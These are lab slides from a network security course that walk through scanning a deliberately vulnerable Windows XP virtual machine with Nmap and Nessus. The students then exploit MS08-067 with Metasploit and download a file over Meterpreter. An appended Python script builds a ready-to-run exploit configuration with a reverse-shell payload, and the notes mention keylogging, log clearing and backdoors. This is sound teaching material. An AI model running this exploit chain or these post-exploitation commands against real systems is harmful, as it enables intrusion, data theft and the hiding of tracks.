Laboratory exercise - Network security - Penetration testing

This is training material for a laboratory exercise that I've practised with the students of the Master Program - Network Security course.

  • Speaker notes (slide 2, attack phases):
    Reconnaissance: passive activity; gathering information about the target (Google, social engineering, dumpster diving, etc.).
    Scanning and enumeration: active activity; discovering open ports, applications and versions; discovering vulnerabilities.
    Gaining access: exploiting the vulnerabilities found; privilege escalation.
    Maintaining access: e.g. rootkits; patching the security hole so that it cannot be exploited by other hackers; making sure the attacker can return to the compromised system.
    Covering tracks and installing backdoors: rootkits, modifying log files, hiding files, installing trojans.
  • Speaker notes (slide 9, the two open ports): 139: NetBIOS Session Service. TCP NetBIOS connections are made over this port, usually by Windows machines but also by any other system running Samba. These TCP connections form "NetBIOS sessions" that carry the connection-oriented file sharing traffic (SMB over NetBIOS). 445: microsoft-ds (Microsoft-DS, "Microsoft Directory Services") is the port used for file sharing. It was introduced with Windows 2000 and carries SMB (Server Message Block; Samba is the open-source implementation of the same protocol, not another name for it) directly over TCP/IP, without the NetBIOS layer. For Windows 2000 and later it replaces the NetBIOS trio (ports 137-139) as the preferred port for Windows file sharing and numerous other services, including the Server service RPC interface that the MS08-067 exploit on slide 13 reaches.
  • Speaker notes (slide 10, Nessus plugin update without Internet access): offline update via https://plugins.nessus.org/offline.php; `nessus-fetch.exe --challenge` prints the challenge code to submit on that page, `nessus-fetch.exe --code-in-use` shows the activation code currently registered.
    1. Computer Network Security. Laboratory exercise. Adrian Furtună, M.Sc., C|EH, [email_address]
    2. Goal of the exercise
      • Demonstrate a computer attack using freely available tools (Nmap and Metasploit are open source; Nessus 4 with the HomeFeed is free to use but not open source):
      • Download the file secrets.txt from the desktop of the victim machine by exploiting one of its vulnerabilities.
      • Walk through the phases of an attack*:
          Reconnaissance -
          Scanning and enumeration - Nmap, Nessus
          Gaining access - Metasploit
          Privilege escalation -
          Maintaining access -
          Covering tracks and installing backdoors -
      * according to the Certified Ethical Hacker (EC-Council) certification material
    3. Lab preparation (30 min)
      • Download and install the following tools:
          nmap-5.00-setup.exe (http://nmap.org)
          Nessus-4.0.2-i386.msi (http://www.nessus.org)
          framework-3.3.3.exe (http://www.metasploit.org)
      • Update the Nessus plugins:
          "Obtain an activation code" (home feed)
          "Register" (after registration the plugin update starts automatically)
      • Prepare the victim:
          Download and unzip the archive winxp_SP2_strip.zip
          Start the virtual machine: Windows XP Professional.vmx
          Log in (user: user, pass: user)
      • Check connectivity (private network, Host <-> Guest):
          ping Host <-> Guest
    4. Disclaimer: Ethical Hacking / Penetration Testing
      • The actions are the same as an attacker's/hacker's
      • The purpose is ethical:
          Discover vulnerabilities
          Propose corrective measures
          No destructive or unauthorised actions
          Proactive, preventive activity
    5. What we will practise
      • Scanning with Nmap
          Open ports
          Versions of the exposed services
          Operating system version
      • Scanning with Nessus
          Automated vulnerability search for the services found in the previous step
      • Exploiting a vulnerability with Metasploit
          Gaining access to the target system
    6. The target of the attack (victim)
      • Operating system: ?????
      • Exposed services: ?????
      • Vulnerabilities: ?????
      • Virtual machine (VMware)
      • Firewall ON/OFF
      • No antivirus
    7. Scanning with Nmap (1) http://insecure.org
      • nmap -h [fragments]
          HOST DISCOVERY:
            -sP: Ping Scan - go no further than determining if host is online
            -PN: Treat all hosts as online -- skip host discovery
            -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
            -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
          SCAN TECHNIQUES:
            -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
            -sU: UDP Scan
            -sN/sF/sX: TCP Null, FIN, and Xmas scans
          PORT SPECIFICATION AND SCAN ORDER:
            -p <port ranges>: Only scan specified ports
            -F: Fast mode - Scan fewer ports than the default scan
          SERVICE/VERSION DETECTION:
            -sV: Probe open ports to determine service/version info
          SCRIPT SCAN:
            -sC: equivalent to --script=default
            --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
          OS DETECTION:
            -O: Enable OS detection
          OUTPUT:
            -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
    8. Scanning with Nmap (2)
      • nmap -sS -sV -O -F -n 10.0.40.69
      • -sS and -O need raw packet access: run Nmap as Administrator with WinPcap installed (the Windows installer bundles it). -F limits the scan to the 100 most common ports, which is why the output below accounts for exactly 100 ports (98 filtered + 2 open); the 98 filtered ports mean the XP host firewall is on and silently dropping everything except the file-sharing exception.
    9. Scanning with Nmap (2)
      • nmap -sS -sV -O -F -n 10.0.40.69
          Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time
          Nmap scan report for 10.254.40.69
          Host is up (0.00011s latency).
          Not shown: 98 filtered ports
          PORT     STATE SERVICE      VERSION
          139/tcp  open  netbios-ssn
          445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
          MAC Address: 00:0C:29:86:DF:91 (VMware)
          Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
          Device type: general purpose
          Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)
          Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%)
          No exact OS matches for host (test conditions non-ideal).
          Network Distance: 1 hop
          Service Info: OS: Windows
          OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
          Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
      • Note the OS warning: with no closed port to probe, the fingerprint is a guess (97% for XP SP2), so the service banner on 445 ("Microsoft Windows XP microsoft-ds") is the stronger evidence for the "Operating system" line on slide 6.
    10. Scanning with Nessus (1) http://www.nessus.org
      • Nessus Server Manager -> Start Nessus Server
      • Nessus Client
          Connect - the client connects to the server
          + Networks to scan - enter the IP address of the target machine
          + Select a scan policy - create a new scan policy:
            Plugin Selection -> Disable All
            Plugin Selection -> Windows (enable only the Windows plugins; this family holds the check for the MS08-067 patch state that the next slides exploit, and restricting the policy to it keeps the scan short and avoids probing services the target does not run)
          Scan Now - starts the scan
          Export - saves the resulting report
    11. Scanning with Nessus (2) http://www.nessus.org
    12. Gaining access - Metasploit (1). Metasploit architecture
      • Metasploit Console, Metasploit Web
      • Modules
          Exploits - exploit a vulnerability and deliver a payload
          Auxiliaries - port scanning, DoS, fuzzing, etc.
          Payloads - encapsulate arbitrary code (shellcode) that runs after a successful exploit
          Nops - generate NOP instructions of arbitrary size (padding that keeps a payload aligned and lets it survive small variations in the landing address)
      • Tutorial: http://www.offensive-security.com/metasploit-unleashed/
    13. Gaining access - Metasploit (2) http://www.metasploit.org
      • We exploit the ms08-067 vulnerability in the Windows Server service, the one used by the Conficker/Kido/Downadup worm: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
      • Start Metasploit Web
      • Exploits -> Search [ms08-067]
      • Set TARGET - Windows XP SP2 English
      • Set PAYLOAD - windows/meterpreter/bind_tcp (or reverse_tcp: bind_tcp makes the victim listen and the attacker connect in, which the XP firewall blocks when it is ON; reverse_tcp makes the victim connect out to the attacker's LHOST/LPORT and works in both firewall states)
      • Set OPTIONS - RHOST (the victim's IP address)
      • Exploit
    14. Gaining access - Metasploit (3) http://www.metasploit.org
    15. Gaining access - Metasploit (4) http://www.metasploit.org
      • Meterpreter help [fragments]
          Stdapi: File system Commands
            Command        Description
            -------        -----------
            cat            Read the contents of a file to the screen
            cd             Change directory
            del            Delete the specified file
            download       Download a file or directory
            edit           Edit a file
            getlwd         Print local working directory
            getwd          Print working directory
            lcd            Change local working directory
            lpwd           Print local working directory
            ls             List files
            mkdir          Make directory
            pwd            Print working directory
            rm             Delete the specified file
            rmdir          Remove directory
            upload         Upload a file or directory
          Stdapi: System Commands
            Command        Description
            -------        -----------
            clearev        Clear the event log
            execute        Execute a command
            kill           Terminate a process
            ps             List running processes
            reboot         Reboots the remote computer
            shell          Drop into a system command shell
            sysinfo        Gets information about the remote system, such as OS
          Stdapi: User interface Commands
            Command        Description
            -------        -----------
            keyscan_dump   Dump the keystroke buffer
            keyscan_start  Start capturing keystrokes
            keyscan_stop   Stop capturing keystrokes
    16. Completing the objective of the exercise
      • Download the file secrets.txt from the desktop of the victim machine by exploiting one of its vulnerabilities.
      • Meterpreter:
          pwd
          cd Desktop
          ls
          download secrets.txt
      • pwd is there for a reason: the session runs inside the exploited Server service, so the working directory is typically C:\WINDOWS\system32 rather than a user profile. If `cd Desktop` fails, change to the desktop by its full path (on this XP image, the profile of the `user` account under C:\Documents and Settings) before running download.
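The Metasploit Web clicks on slides 13 to 16 map one-to-one onto msfconsole commands, and a resource script lets the lab be re-run without the GUI. The Python helper below is an added example, not part of the lab material: it writes the resource script for exploit/windows/smb/ms08_067_netapi (the real module path; RHOST, PAYLOAD, TARGET, LHOST and LPORT are the real option names) and refuses the two combinations that cannot work, bind_tcp against a victim whose firewall drops inbound connections (slide 9 showed 98 of 100 ports filtered) and reverse_tcp without an LHOST. The attacker address 10.0.40.1 and TARGET index 0 (Automatic Targeting) are assumptions; the slide chose "Windows XP SP2 English" by name, which in msfconsole means `show targets` and the matching index.

```python
"""Build an msfconsole resource script (.rc) for the lab's MS08-067 step.

Added example, not part of the lab material. Module, payload and option names
are Metasploit's own; the victim IP is the lab's (10.0.40.69), the attacker IP
is assumed. Run the generated file with: msfconsole -r ms08_067.rc
"""
import ipaddress

MODULE = "exploit/windows/smb/ms08_067_netapi"
TRANSPORTS = ("bind_tcp", "reverse_tcp")


def build_ms08_067_rc(rhost, transport="reverse_tcp", lhost=None, lport=4444,
                      target=0, victim_firewalled=True):
    """Return the text of a resource script reproducing the Metasploit Web clicks.

    bind_tcp: the payload listens on the victim's LPORT and the attacker connects in.
    reverse_tcp: the payload connects out to the attacker's LHOST:LPORT.
    With the XP firewall on, the inbound connection bind_tcp needs is dropped,
    so bind_tcp is rejected unless the caller states the firewall is off.
    """
    if transport not in TRANSPORTS:
        raise ValueError("transport must be one of %s, got %r" % (TRANSPORTS, transport))
    ipaddress.ip_address(rhost)  # raises ValueError on a malformed RHOST
    if transport == "bind_tcp" and victim_firewalled:
        raise ValueError("bind_tcp needs an inbound connection to the victim's LPORT, "
                         "but the scan showed the host firewall filtering unsolicited "
                         "ports; use reverse_tcp")
    if transport == "reverse_tcp":
        if not lhost:
            raise ValueError("reverse_tcp needs LHOST, the attacker address the "
                             "victim connects back to")
        ipaddress.ip_address(lhost)
    if not 0 < lport < 65536:
        raise ValueError("LPORT out of range: %r" % lport)

    lines = [
        "use " + MODULE,
        "set RHOST " + rhost,
        "set TARGET %d" % target,  # 0 = Automatic Targeting (assumption; check `show targets`)
        "set PAYLOAD windows/meterpreter/" + transport,
        "set LPORT %d" % lport,
    ]
    if transport == "reverse_tcp":
        lines.append("set LHOST " + lhost)
    lines.append("exploit")
    return "\n".join(lines) + "\n"


def write_rc(path, rhost, **kwargs):
    """Write the script to disk and return its text."""
    text = build_ms08_067_rc(rhost, **kwargs)
    with open(path, "w") as fh:
        fh.write(text)
    return text


if __name__ == "__main__":
    # Lab victim from slide 8; attacker address on the private host-guest network is assumed.
    print(write_rc("ms08_067.rc", "10.0.40.69", transport="reverse_tcp", lhost="10.0.40.1"))
```

After `msfconsole -r ms08_067.rc` returns a Meterpreter prompt, the objective is the four commands from slide 16 (pwd, cd to the desktop, ls, download secrets.txt). If the victim's firewall was switched OFF on slide 6, `build_ms08_067_rc(..., transport="bind_tcp", victim_firewalled=False)` produces the bind variant, which needs no LHOST because the attacker connects to the victim.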
    17. The End. Thank you! Adrian Furtună, M.Sc., C|EH, [email_address]   ? Q U E S T I O N S ?
